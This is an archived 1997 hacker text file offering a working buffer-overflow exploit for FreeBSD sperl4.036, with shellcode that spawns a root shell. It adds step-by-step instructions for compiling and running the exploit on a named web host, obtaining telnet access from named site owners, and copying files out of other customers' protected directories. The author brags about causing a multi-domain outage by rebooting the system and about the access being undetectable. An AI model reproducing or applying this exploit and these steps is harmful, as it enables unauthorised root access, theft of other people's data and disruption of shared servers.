home *** CD-ROM | disk | FTP | other *** search
- //------------------------------------------------\\
- || Get Read/Write/Reboot/Shutdown access to the ||
- || entire nethosting.com system including all ||
- || 231 of its subdomains! ||
- || By: Lord Somer(webmaster@lordsomer.com) ||
- || on August 4, 1997 ||
- || For: The Hackers Layer ||
- || http://www.lordsomer.com ||
- || and ||
- || The Hackers Club ||
- || http://www.hackersclub.com/km/index.html ||
- \\------------------------------------------------//
-
- Well Recently I was Logged into a nethosting.com account on telnet
- reconfiguring my eggdrop bot, and I found the file perl.c(including below)
- and thought to myself what might this be so I grabbed a copy for myself
- and it said it was a sperl exploit and not much else, so I figured what the
- hell lets test this sucker, so I ran it low and behold root access sorta
- you have permission to do everything but addusers(go figure!), so just to
- make sure it wasn't bullshit I did a reboot on the sys hence the system
- outage on 8/2-8/3 for many domains including hawkee.com(more on this later).
- Well when it finally came back online amasingly, I decide to do more probing
- after running that exploit again, I decide what the hell lets do a test so
- I go into TwoSlows accounts dir(yes he's on there) and make a nice dir called
- suptwoslow for him and he confirmed that it was in his account, thus proving
- that you get world read/write/reboot/shutdown. If anyone figures out how
- to addusers on this sys let me know.
- Ok enough of the stories on with the instructions...
- First Make a new text file and name it perl.c, and cut/paste the below part
- minus the 2 --- lines seperating it out.
-
- ----------------------Begin Perl.c---------------------------------
-
- /************************************************************/
- /* Exploit for FreeBSD sperl4.036 by OVX */
- /************************************************************/
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
-
- #define BUFFER_SIZE 1400
- #define OFFSET 600
-
- char *get_esp(void) {
- asm("movl %esp,%eax");
- }
- char buf[BUFFER_SIZE];
-
- main(int argc, char *argv[])
- {
- int i;
- char execshell[] =
- "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
- "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
- "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
- "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
-
- for(i=0+1;i<BUFFER_SIZE-4;i+=4)
- *(char **)&buf[i] = get_esp() - OFFSET;
-
- memset(buf,0x90,768+1);
- memcpy(&buf[768+1],execshell,strlen(execshell));
-
- buf[BUFFER_SIZE-1]=0;
-
- execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
- }
- --------------------------End Perl.c------------------------------------
-
- ok well your gonna need telnet access for this sucker to work, hmm who to
- get that from? well only the domains owners that are hosted on nethosting
- have this access so offer them a deal you'll show em how to do this.
- A few People To ask might be:
- www.hpvca.com
- www.warez950.org
- www.7thsphere.com
- www.lgn.com
- www.hawkee.com
- Ok so by now you've gotten telnet access to the sys.
- which means your got ftp also, so ftp in to the account and upload perl.c
- then logout of ftp, and telnet in, cd to the dir you up'd perl.c to.
- Type cc perl.c
- then ./a.out
- type those exactly and hit enter after each one.
- your command prompt should change to a #
- type whoami
- should respond root
- well there ya have it feel free to do what ya like.
- oh yeah and say you hit someone like hawkee.com's cgibin dir, he has blocked
- group ftp access to this dir, oh shucks ya say. Eh easy as pie to solve
- in the account you have ftp access to make a temp dir to copy the shit ya
- want to. get the full patth to it like /usr/home/sucker.com/temp
- k,
- back in the shell(after running exploit) go to dir ya wanna steal and type
- cp * /path/to/temp/stealing/dir
-
- Enjoy, and hope ya can get on considering nethosting.com is down 80% of the
- time. Oh and also nethosting.com is also eggable, wanna know how to install
- eggdrop just read my guide at http://www.lordsomer.com/eggdrop.html
-
- 1 Great thing about this exploit is, nethosting.com cant tell you have root
- access, since it still looks like you are the user you logged in with.
-